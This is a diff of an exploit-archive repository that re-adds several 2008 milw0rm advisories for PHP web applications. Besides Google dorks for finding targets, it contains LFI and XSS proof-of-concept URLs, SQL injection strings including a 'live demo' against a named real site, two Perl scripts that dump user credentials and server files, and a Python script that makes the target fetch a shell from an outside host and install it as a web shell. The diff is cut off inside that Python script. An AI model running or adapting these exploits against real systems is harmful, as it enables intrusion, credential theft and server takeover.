+################################################################ +# Greetings: str0ke, Dr.Trojan, all member in DeltaHacking.Net # +################################################################ + + +WebSite: WwW.DeltaHacking.Net & WwW.w3bsecurity.iR + +Contact: Cru3l.b0y[at]gmail.com + +# milw0rm.com [2008-09-10] diff --git a/platforms/php/webapps/6425.txt b/platforms/php/webapps/6425.txt index aff99bc88..49ffd6bd4 100755 --- a/platforms/php/webapps/6425.txt +++ b/platforms/php/webapps/6425.txt 
@@ -1,51 +1,51 @@
-----------------------------------------------------------------
-
-Script : PhpWebGallery 1.3.4
-
-Type : Multiple Vulnerabilities (XSS/LFI)
-
-Rist : High
-
-Google Dork : inurl:"picture.php?cat=" "Powered by PhpWebGallery 1.3.4"
-
-----------------------------------------------------------------
-
-Download From : http://puzzle.dl.sourceforge.net/sourceforge/phpwebgallery/phpwebgallery-1.3.4.tar.bz2
-
-----------------------------------------------------------------
-
-Discovered by : Khashayar Fereidani Or Dr.Crash
-
-My Official Website : HTTP://FEREIDANI.IR
-
-Team Website : Http://IRCRASH.COM
-
-Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
-
-----------------------------------------------------------------
-
-Local File Inclusion Vulnerabilities :
-
-Lfi 1 : http://example/include/init.inc.php?user[language]=../../[LFI]
-
-Lfi 2 : http://example/include/init.inc.php?user[template]=../../[LFI]
-
-Lfi 3 : http://example/include/isadmin.inc.php?user[language]=../../[LFI]
-
------------------------------------------------------------------
-
-Cross Site Scripting Vulnerabilities :
-
-Xss 1 : http://example/admin/include/isadmin.inc.php?lang[access_forbiden]=
-
-Xss 2 : http://example/admin/include/isadmin.inc.php?lang[ident_title]=
-
-----------------------------------------------------------------
-
- Tnx : God
-
- HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
-
-----------------------------------------------------------------
-
-# milw0rm.com [2008-09-11]
+----------------------------------------------------------------
+
+Script : PhpWebGallery 1.3.4
+
+Type : Multiple Vulnerabilities (XSS/LFI)
+
+Rist : High
+
+Google Dork : inurl:"picture.php?cat=" "Powered by PhpWebGallery 1.3.4"
+
+----------------------------------------------------------------
+
+Download From : http://puzzle.dl.sourceforge.net/sourceforge/phpwebgallery/phpwebgallery-1.3.4.tar.bz2
+
+----------------------------------------------------------------
+
+Discovered by : Khashayar Fereidani Or Dr.Crash
+
+My Official Website : HTTP://FEREIDANI.IR
+
+Team Website : Http://IRCRASH.COM
+
+Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
+
+----------------------------------------------------------------
+
+Local File Inclusion Vulnerabilities :
+
+Lfi 1 : http://example/include/init.inc.php?user[language]=../../[LFI]
+
+Lfi 2 : http://example/include/init.inc.php?user[template]=../../[LFI]
+
+Lfi 3 : http://example/include/isadmin.inc.php?user[language]=../../[LFI]
+
+-----------------------------------------------------------------
+
+Cross Site Scripting Vulnerabilities :
+
+Xss 1 : http://example/admin/include/isadmin.inc.php?lang[access_forbiden]=
+
+Xss 2 : http://example/admin/include/isadmin.inc.php?lang[ident_title]=
+
+----------------------------------------------------------------
+
+ Tnx : God
+
+ HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
+
+----------------------------------------------------------------
+
+# milw0rm.com [2008-09-11]
diff --git a/platforms/php/webapps/6426.txt b/platforms/php/webapps/6426.txt
index 06eb0457d..e426ad4a2 100755
--- a/platforms/php/webapps/6426.txt
+++ b/platforms/php/webapps/6426.txt
@@ -1,55 +1,55 @@ -################################################################ -# .___ __ _______ .___ # -# __| _/____ _______| | __ ____ \ _ \ __| _/____ # -# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # -# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # -# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # -# \/ \/ \/ # -# ___________ ______ _ __ # -# _/ ___\_ __ \_/ __ \ \/ \/ / # -# \ \___| | \/\ ___/\ / # -# \___ >__| \___ >\/\_/ # -# est.2007 \/ \/ forum.darkc0de.com # -################################################################ -# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # -# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE # -# and all darkc0de members ---# -################################################################ -# -# Author: r45c4l -# -# Home : www.darkc0de.com -# -# Email : r45c4l@hotmail.com -# -# Share the c0de! -# -################################################################ -# -# Title: Zanfi CMS lite / Autodealers CMS AutOnline (SQL Injection) -# -# Vendor: http://www.zanfi.nl/autodealerscms.php -# -# Demo: http://autonline.zanfi.nl/ -########################################################### -# -# d0rk:Powered by: Zanfi Solutions -#. 
-# -########################################################### - - Exploit:- - http://www.site.com/[path]/index.php?page=DBpAGE&pageid=-1'+union+select+null,concat(version(),0x3a,database(),0x3a,user())/* - - - - Live Demo: - http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=DBpAGE&pageid=-1%27+union+select+null,concat(version(),0x3a,database(),0x3a,user())/* - - -########################################################### -# -# Bug discovered : 10 Sep.2008 -########################################################### - -# milw0rm.com [2008-09-11] +################################################################ +# .___ __ _______ .___ # +# __| _/____ _______| | __ ____ \ _ \ __| _/____ # +# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # +# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # +# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # +# \/ \/ \/ # +# ___________ ______ _ __ # +# _/ ___\_ __ \_/ __ \ \/ \/ / # +# \ \___| | \/\ ___/\ / # +# \___ >__| \___ >\/\_/ # +# est.2007 \/ \/ forum.darkc0de.com # +################################################################ +# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # +# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE # +# and all darkc0de members ---# +################################################################ +# +# Author: r45c4l +# +# Home : www.darkc0de.com +# +# Email : r45c4l@hotmail.com +# +# Share the c0de! +# +################################################################ +# +# Title: Zanfi CMS lite / Autodealers CMS AutOnline (SQL Injection) +# +# Vendor: http://www.zanfi.nl/autodealerscms.php +# +# Demo: http://autonline.zanfi.nl/ +########################################################### +# +# d0rk:Powered by: Zanfi Solutions +#. 
+# +########################################################### + + Exploit:- + http://www.site.com/[path]/index.php?page=DBpAGE&pageid=-1'+union+select+null,concat(version(),0x3a,database(),0x3a,user())/* + + + + Live Demo: + http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=DBpAGE&pageid=-1%27+union+select+null,concat(version(),0x3a,database(),0x3a,user())/* + + +########################################################### +# +# Bug discovered : 10 Sep.2008 +########################################################### + +# milw0rm.com [2008-09-11] diff --git a/platforms/php/webapps/6427.txt b/platforms/php/webapps/6427.txt index 5c33ff239..a0d4dcfce 100755 --- a/platforms/php/webapps/6427.txt +++ b/platforms/php/webapps/6427.txt 
@@ -1,15 +1,15 @@ ---==+============================================================================+==-- ---==+ Sports Clubs Web Panel 0.0.1 Local File Inclusion Vulnerability +==-- ---==+============================================================================+==-- - - [*] Discovered By: StAkeR ~ StAkeR@hotmail.it - [+] Discovered On: 11 Sep 2008 - [+] Download: http://sourceforge.net/project/downloading.php?group_id=188949&use_mirror=ovh&filename=sportspanel-0.0.1a.tar.gz&50146370 - - [*] Vulnerability: - - [*] LFI - [+] index.php?p= [File %00] - [+] http://site.com/index.php?p=../../../../../../../etc/passwd%00 - -# milw0rm.com [2008-09-11] +--==+============================================================================+==-- +--==+ Sports Clubs Web Panel 0.0.1 Local File Inclusion Vulnerability +==-- +--==+============================================================================+==-- + + [*] Discovered By: StAkeR ~ StAkeR@hotmail.it + [+] Discovered On: 11 Sep 2008 + [+] Download: http://sourceforge.net/project/downloading.php?group_id=188949&use_mirror=ovh&filename=sportspanel-0.0.1a.tar.gz&50146370 + + [*] Vulnerability: + + [*] LFI + [+] index.php?p= [File %00] + [+] http://site.com/index.php?p=../../../../../../../etc/passwd%00 + +# milw0rm.com [2008-09-11] diff --git a/platforms/php/webapps/6428.pl b/platforms/php/webapps/6428.pl index c7b593854..6f97a43e2 100755 --- a/platforms/php/webapps/6428.pl +++ b/platforms/php/webapps/6428.pl 
@@ -1,205 +1,205 @@ -#!/usr/bin/perl -#---------------------------------------------------------------- -# -#Script : Ezphotogallery 2.1 -# -#Type : Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure) -# -#Method : GET -# -#Alert : High -# -#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid=" -# -#---------------------------------------------------------------- -# -#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash -# -#My Official Website : HTTP://FEREIDANI.IR -# -#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com -# -#---------------------------------------------------------------- -# -#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR -# -#---------------------------------------------------------------- -# -#Script Download : http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip -# -#---------------------------------------------------------------- -#Xss Vulnerabilities : -# -#Xss 1 : gallery.php?galleryid= -#Xss 2 : show.php?imageid=156&size="''>""'' -#Xss 3 : show.php?imageid= -# -#---------------------------------------------------------------- -#Login Bypass : -# -#Insert in gallery.php -# -#User : admin ' or ' 1=1 -#Password : Dr.Crash -# -#---------------------------------------------------------------- -#Sql Injection : -# -#Injection 1 : show.php?imageid= -#---------------------------------------------------------------- -# -# Tnx : God -# -# HTTP://IRCRASH.COM -# -#---------------------------------------------------------------- - -use LWP; -use HTTP::Request; -use Getopt::Long; - - -$scriptname="Ezphotogallery 2.1"; - -sub header -{ -print " -**************************************************** -* $scriptname -**************************************************** -*Discovered by : Khashayar Fereidani * -*Exploited by : Khashayar Fereidani * -*My Official Website : http://fereidani.ir * -****************************************************"; -} - 
-sub usage -{ - print " -* Usage : perl $0 http://Example/ -**************************************************** -"; -} - - -$url = ($ARGV[0]); - -if(!$url) -{ -header(); -usage(); -exit; -} -if($url !~ /\//){$url = $url."/";} -if($url !~ /http:\/\//){$url = "http://".$url;} -sub xpl1() -{ -#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e) -$vul = "/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),4,5,6,7,8,9+from+users/*"; -$requestpage = $url.$vul; - - -my $req = HTTP::Request->new("POST",$requestpage); -$ua = LWP::UserAgent->new; -$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); -#$req->referer($url); -$req->referer("IRCRASH.COM"); -$req->content_type('application/x-www-form-urlencoded'); -$req->header("content-length" => $contlen); -$req->content($poststring); - -$response = $ua->request($req); -$content = $response->content; -$header = $response->headers_as_string(); - -@name = split(/Login:/,$content); -$name = @name[1]; -@name = split(//,$name); -$name = @name[0]; - -@password = split(/Password:/,$content); -$password = @password[1]; -@password = split(//,$password); -$password = @password[0]; - -if(!$name && !$password) -{ -print "\n\n"; -print "!Exploit failed ! 
:(\n\n"; -exit; -} - -print "\n Username: ".$name."\n\n"; -print " Password: " .$password."\n\n"; - - -} - - -#XPL2 - -sub xpl2() -{ -print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd"; -print "\n Enter File Address :"; -$fil3 = ; - -$vul = "/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),4,5,6,7,8,9+from+users/*"; -$requestpage = $url.$vul; - -my $req = HTTP::Request->new("POST",$requestpage); -$ua = LWP::UserAgent->new; -$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); -#$req->referer($url); -$req->referer("IRCRASH.COM"); -$req->content_type('application/x-www-form-urlencoded'); -$req->header("content-length" => $contlen); -$req->content($poststring); - -$response = $ua->request($req); -$content = $response->content; -$header = $response->headers_as_string(); - - -@name = split(/Login:/,$content); -$name = @name[1]; -@name = split(//,$name); -$name = @name[0]; - - -if(!$name && !$password) -{ -print "\n\n"; -print "!Exploit failed ! :(\n\n"; -exit; -} - -open (FILE, ">".source.".txt"); -print FILE $name; -close (FILE); -print " File Save In source.txt\n"; -print ""; - -} - -#XPL2 END -#Starting; -print " -**************************************************** -* $scriptname -**************************************************** -*Discovered by : Khashayar Fereidani * -*Exploited by : Khashayar Fereidani * -*My Official Website : http://fereidani.ir * -**************************************************** -* Mod Options : * -* Mod 1 : Find Script username and password * -* Mod 2 : File Disclosure mode * -****************************************************"; -print "\n \n Enter Mod : "; -$mod=; -if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! 
\n Exploit Failed !"; }; -if ($mod=="1") { xpl1(); }; -if ($mod=="2") { xpl2(); }; - -# milw0rm.com [2008-09-11] +#!/usr/bin/perl +#---------------------------------------------------------------- +# +#Script : Ezphotogallery 2.1 +# +#Type : Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure) +# +#Method : GET +# +#Alert : High +# +#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid=" +# +#---------------------------------------------------------------- +# +#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash +# +#My Official Website : HTTP://FEREIDANI.IR +# +#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com +# +#---------------------------------------------------------------- +# +#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR +# +#---------------------------------------------------------------- +# +#Script Download : http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip +# +#---------------------------------------------------------------- +#Xss Vulnerabilities : +# +#Xss 1 : gallery.php?galleryid= +#Xss 2 : show.php?imageid=156&size="''>""'' +#Xss 3 : show.php?imageid= +# +#---------------------------------------------------------------- +#Login Bypass : +# +#Insert in gallery.php +# +#User : admin ' or ' 1=1 +#Password : Dr.Crash +# +#---------------------------------------------------------------- +#Sql Injection : +# +#Injection 1 : show.php?imageid= +#---------------------------------------------------------------- +# +# Tnx : God +# +# HTTP://IRCRASH.COM +# +#---------------------------------------------------------------- + +use LWP; +use HTTP::Request; +use Getopt::Long; + + +$scriptname="Ezphotogallery 2.1"; + +sub header +{ +print " +**************************************************** +* $scriptname +**************************************************** +*Discovered by : Khashayar Fereidani * +*Exploited by : Khashayar Fereidani * +*My Official 
Website : http://fereidani.ir * +****************************************************"; +} + +sub usage +{ + print " +* Usage : perl $0 http://Example/ +**************************************************** +"; +} + + +$url = ($ARGV[0]); + +if(!$url) +{ +header(); +usage(); +exit; +} +if($url !~ /\//){$url = $url."/";} +if($url !~ /http:\/\//){$url = "http://".$url;} +sub xpl1() +{ +#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e) +$vul = "/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),4,5,6,7,8,9+from+users/*"; +$requestpage = $url.$vul; + + +my $req = HTTP::Request->new("POST",$requestpage); +$ua = LWP::UserAgent->new; +$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); +#$req->referer($url); +$req->referer("IRCRASH.COM"); +$req->content_type('application/x-www-form-urlencoded'); +$req->header("content-length" => $contlen); +$req->content($poststring); + +$response = $ua->request($req); +$content = $response->content; +$header = $response->headers_as_string(); + +@name = split(/Login:/,$content); +$name = @name[1]; +@name = split(//,$name); +$name = @name[0]; + +@password = split(/Password:/,$content); +$password = @password[1]; +@password = split(//,$password); +$password = @password[0]; + +if(!$name && !$password) +{ +print "\n\n"; +print "!Exploit failed ! 
:(\n\n"; +exit; +} + +print "\n Username: ".$name."\n\n"; +print " Password: " .$password."\n\n"; + + +} + + +#XPL2 + +sub xpl2() +{ +print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd"; +print "\n Enter File Address :"; +$fil3 = ; + +$vul = "/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),4,5,6,7,8,9+from+users/*"; +$requestpage = $url.$vul; + +my $req = HTTP::Request->new("POST",$requestpage); +$ua = LWP::UserAgent->new; +$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); +#$req->referer($url); +$req->referer("IRCRASH.COM"); +$req->content_type('application/x-www-form-urlencoded'); +$req->header("content-length" => $contlen); +$req->content($poststring); + +$response = $ua->request($req); +$content = $response->content; +$header = $response->headers_as_string(); + + +@name = split(/Login:/,$content); +$name = @name[1]; +@name = split(//,$name); +$name = @name[0]; + + +if(!$name && !$password) +{ +print "\n\n"; +print "!Exploit failed ! :(\n\n"; +exit; +} + +open (FILE, ">".source.".txt"); +print FILE $name; +close (FILE); +print " File Save In source.txt\n"; +print ""; + +} + +#XPL2 END +#Starting; +print " +**************************************************** +* $scriptname +**************************************************** +*Discovered by : Khashayar Fereidani * +*Exploited by : Khashayar Fereidani * +*My Official Website : http://fereidani.ir * +**************************************************** +* Mod Options : * +* Mod 1 : Find Script username and password * +* Mod 2 : File Disclosure mode * +****************************************************"; +print "\n \n Enter Mod : "; +$mod=; +if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; }; +if ($mod=="1") { xpl1(); }; +if ($mod=="2") { xpl2(); }; + +# milw0rm.com [2008-09-11] 
diff --git a/platforms/php/webapps/6430.txt b/platforms/php/webapps/6430.txt index 1ea954add..209299d8c 100755 --- a/platforms/php/webapps/6430.txt +++ b/platforms/php/webapps/6430.txt @@ -1,23 +1,23 @@ -############################################################################################################ -[+] D-iscussion Board 3.01 Local File Inclusion -[+] Discovered By SirGod -[+] MorTal TeaM -[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,str0ke -############################################################################################################ - -Download : http://dino.shiftedphase.com/comp/downloads/forum.zip - -[+] Local File Inclusion - - - PoC : - - http://[target]/[path]/general/index.php?topic=[LocalFile]%00 - - Example : - - http://127.0.0.1/3.01/general/index.php?topic=../../../../autoexec.bat%00 - -############################################################################################################ - -# milw0rm.com [2008-09-11] +############################################################################################################ +[+] D-iscussion Board 3.01 Local File Inclusion +[+] Discovered By SirGod +[+] MorTal TeaM +[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,str0ke +############################################################################################################ + +Download : http://dino.shiftedphase.com/comp/downloads/forum.zip + +[+] Local File Inclusion + + + PoC : + + http://[target]/[path]/general/index.php?topic=[LocalFile]%00 + + Example : + + http://127.0.0.1/3.01/general/index.php?topic=../../../../autoexec.bat%00 + +############################################################################################################ + +# milw0rm.com [2008-09-11] diff --git a/platforms/php/webapps/6431.pl b/platforms/php/webapps/6431.pl index 1e53c48ee..a8b79301a 100755 --- a/platforms/php/webapps/6431.pl +++ b/platforms/php/webapps/6431.pl 
@@ -1,184 +1,184 @@ -#!/usr/bin/perl -#---------------------------------------------------------------- -# -#Script : PhsBlog v0.2 -# -#Type : Bypass Sql injection Filtering Exploit -# -#Method : GET -# -#Risk : High -# -#---------------------------------------------------------------- -# -#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash -# -#My Official Website : HTTP://FEREIDANI.IR -# -#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com -# -#---------------------------------------------------------------- -# -#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR -# -#---------------------------------------------------------------- -# -#Script Download : http://www.phsdev.com/downloads/phsblog_current.zip -# -#---------------------------------------------------------------- -# -# Tnx : God -# -# HTTP://IRCRASH.COM -# -#---------------------------------------------------------------- - -use LWP; -use HTTP::Request; -use Getopt::Long; - - -$scriptname="PhsBlog v0.2"; - -sub header -{ -print " -**************************************************** -* $scriptname -**************************************************** -*Discovered by : Khashayar Fereidani * -*Exploited by : Khashayar Fereidani * -*My Official Website : http://fereidani.ir * -****************************************************"; -} - -sub usage -{ - print " -* Usage : perl $0 http://Example/ -**************************************************** -"; -} - - -$url = ($ARGV[0]); - -if(!$url) -{ -header(); -usage(); -exit; -} -if($url !~ /\//){$url = $url."/";} -if($url !~ /http:\/\//){$url = "http://".$url;} -sub xpl1() -{ -#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e) -$vul = "/index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12+from+phsblog_users/*"; -$requestpage = $url.$vul; - - -my $req = 
HTTP::Request->new("POST",$requestpage); -$ua = LWP::UserAgent->new; -$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); -#$req->referer($url); -$req->referer("IRCRASH.COM"); -$req->content_type('application/x-www-form-urlencoded'); -$req->header("content-length" => $contlen); -$req->content($poststring); - -$response = $ua->request($req); -$content = $response->content; -$header = $response->headers_as_string(); - -@name = split(/Login:/,$content); -$name = @name[1]; -@name = split(//,$name); -$name = @name[0]; - -@password = split(/Password:/,$content); -$password = @password[1]; -@password = split(//,$password); -$password = @password[0]; - -if(!$name && !$password) -{ -print "\n\n"; -print "!Exploit failed ! :(\n\n"; -exit; -} - -print "\n Username: ".$name."\n\n"; -print " Password: " .$password."\n\n"; - - -} - - -#XPL2 - -sub xpl2() -{ -print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd"; -print "\n Enter File Address :"; -$fil3 = ; -#index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),6,7,8,9,10,11,12+from+phsblog_users/* -$vul = "?show=pickup&sid=99999'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*"; -$requestpage = $url.$vul; - -my $req = HTTP::Request->new("POST",$requestpage); -$ua = LWP::UserAgent->new; -$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); -#$req->referer($url); -$req->referer("IRCRASH.COM"); -$req->content_type('application/x-www-form-urlencoded'); -$req->header("content-length" => $contlen); -$req->content($poststring); - -$response = $ua->request($req); -$content = $response->content; -$header = $response->headers_as_string(); - - -@name = split(/Login:/,$content); -$name = @name[1]; -@name = split(//,$name); -$name = @name[0]; - - -if(!$name && !$password) -{ -print "\n\n"; -print "!Exploit failed ! 
:(\n\n"; -exit; -} - -open (FILE, ">".source.".txt"); -print FILE $name; -close (FILE); -print " File Save In source.txt\n"; -print ""; - -} - -#XPL2 END -#Starting; -print " -**************************************************** -* $scriptname -**************************************************** -*Discovered by : Khashayar Fereidani * -*Exploited by : Khashayar Fereidani * -*My Official Website : http://fereidani.ir * -**************************************************** -* Mod Options : * -* Mod 1 : Find Script username and password * -* Mod 2 : File Disclosure(not work in many servers)* -****************************************************"; -print "\n \n Enter Mod : "; -$mod=; -if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; }; -if ($mod=="1") { xpl1(); }; -if ($mod=="2") { xpl2(); }; - -# milw0rm.com [2008-09-11] +#!/usr/bin/perl +#---------------------------------------------------------------- +# +#Script : PhsBlog v0.2 +# +#Type : Bypass Sql injection Filtering Exploit +# +#Method : GET +# +#Risk : High +# +#---------------------------------------------------------------- +# +#Discovered by : Khashayar Fereidani a.k.a. 
Dr.Crash +# +#My Official Website : HTTP://FEREIDANI.IR +# +#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com +# +#---------------------------------------------------------------- +# +#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR +# +#---------------------------------------------------------------- +# +#Script Download : http://www.phsdev.com/downloads/phsblog_current.zip +# +#---------------------------------------------------------------- +# +# Tnx : God +# +# HTTP://IRCRASH.COM +# +#---------------------------------------------------------------- + +use LWP; +use HTTP::Request; +use Getopt::Long; + + +$scriptname="PhsBlog v0.2"; + +sub header +{ +print " +**************************************************** +* $scriptname +**************************************************** +*Discovered by : Khashayar Fereidani * +*Exploited by : Khashayar Fereidani * +*My Official Website : http://fereidani.ir * +****************************************************"; +} + +sub usage +{ + print " +* Usage : perl $0 http://Example/ +**************************************************** +"; +} + + +$url = ($ARGV[0]); + +if(!$url) +{ +header(); +usage(); +exit; +} +if($url !~ /\//){$url = $url."/";} +if($url !~ /http:\/\//){$url = "http://".$url;} +sub xpl1() +{ +#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e) +$vul = "/index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12+from+phsblog_users/*"; +$requestpage = $url.$vul; + + +my $req = HTTP::Request->new("POST",$requestpage); +$ua = LWP::UserAgent->new; +$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); +#$req->referer($url); +$req->referer("IRCRASH.COM"); +$req->content_type('application/x-www-form-urlencoded'); +$req->header("content-length" => $contlen); +$req->content($poststring); + +$response = $ua->request($req); 
+$content = $response->content; +$header = $response->headers_as_string(); + +@name = split(/Login:/,$content); +$name = @name[1]; +@name = split(//,$name); +$name = @name[0]; + +@password = split(/Password:/,$content); +$password = @password[1]; +@password = split(//,$password); +$password = @password[0]; + +if(!$name && !$password) +{ +print "\n\n"; +print "!Exploit failed ! :(\n\n"; +exit; +} + +print "\n Username: ".$name."\n\n"; +print " Password: " .$password."\n\n"; + + +} + + +#XPL2 + +sub xpl2() +{ +print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd"; +print "\n Enter File Address :"; +$fil3 = ; +#index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),6,7,8,9,10,11,12+from+phsblog_users/* +$vul = "?show=pickup&sid=99999'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*"; +$requestpage = $url.$vul; + +my $req = HTTP::Request->new("POST",$requestpage); +$ua = LWP::UserAgent->new; +$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); +#$req->referer($url); +$req->referer("IRCRASH.COM"); +$req->content_type('application/x-www-form-urlencoded'); +$req->header("content-length" => $contlen); +$req->content($poststring); + +$response = $ua->request($req); +$content = $response->content; +$header = $response->headers_as_string(); + + +@name = split(/Login:/,$content); +$name = @name[1]; +@name = split(//,$name); +$name = @name[0]; + + +if(!$name && !$password) +{ +print "\n\n"; +print "!Exploit failed ! 
:(\n\n"; +exit; +} + +open (FILE, ">".source.".txt"); +print FILE $name; +close (FILE); +print " File Save In source.txt\n"; +print ""; + +} + +#XPL2 END +#Starting; +print " +**************************************************** +* $scriptname +**************************************************** +*Discovered by : Khashayar Fereidani * +*Exploited by : Khashayar Fereidani * +*My Official Website : http://fereidani.ir * +**************************************************** +* Mod Options : * +* Mod 1 : Find Script username and password * +* Mod 2 : File Disclosure(not work in many servers)* +****************************************************"; +print "\n \n Enter Mod : "; +$mod=; +if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; }; +if ($mod=="1") { xpl1(); }; +if ($mod=="2") { xpl2(); }; + +# milw0rm.com [2008-09-11] diff --git a/platforms/php/webapps/6432.py b/platforms/php/webapps/6432.py index 37edf4b6a..83c23f20d 100755 --- a/platforms/php/webapps/6432.py +++ b/platforms/php/webapps/6432.py 
@@ -1,48 +1,48 @@ -#!/usr/bin/python -##################################################################################### -#### minb Remote Code Execution Exploit #### -##################################################################################### -# # -#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # -#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # -#Our Site : Http://IRCRASH.COM # -#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # -##################################################################################### -# # -#Site : http://minb.sf.net # -# # -#Download : http://switch.dl.sourceforge.net/sourceforge/minb/minb-0.1.0.tar.bz2 # -# # -#DORK : Powered by minb # -# # -##################################################################################### -# [Note] # -# # -#All php file in this cms have this bug ;) # -# # -##################################################################################### -# Site : Http://IRCRASH.COM # -###################################### TNX GOD ###################################### -import sys,urllib -if len(sys.argv)<3 : - print "minb Remote code Execution Exploit" - print "Powered by : R3d.W0rm" - print "www.IrCrash.com" - print "Usage : " + sys.argv[0] + " http://Target/path http://evil/shell.txt" - print "Ex. 
" + sys.argv[0] + " http://site.com/minb http://r3d.a20.ir/r.txt" - exit() -if 'http://' not in sys.argv[1] : - sys.argv[1]='http://' + sys.argv[1] -if 'http://' not in sys.argv[2] : - sys.argv[2]='http://' + sys.argv[2] -fp='/include/modules/top/1-random_quote.php?parse=r3d.w0rm' -data=urllib.urlencode({'quotes_to_edit':'quotes_to_edit=";$s=fopen(\'' + sys.argv[2] + '\',r);while(!feof($s)){$shell.=fread($s,1024);};fclose($s);$fp=fopen(\'../../../upload/pictures/r3d.w0rm.php\',\'w+\');fwrite($fp,$shell);fclose($fp);/*'}) -urllib.urlopen(sys.argv[1] + fp,data) -urllib.urlopen(sys.argv[1] + fp) -test=urllib.urlopen(sys.argv[1] + '/upload/pictures/r3d.w0rm.php').read() -if 'Not Found' not in test : - print "Shell Uploaded ." - print sys.argv[1] + '/upload/pictures/r3d.w0rm.php' -exit() - -# milw0rm.com [2008-09-11] +#!/usr/bin/python +##################################################################################### +#### minb Remote Code Execution Exploit #### +##################################################################################### 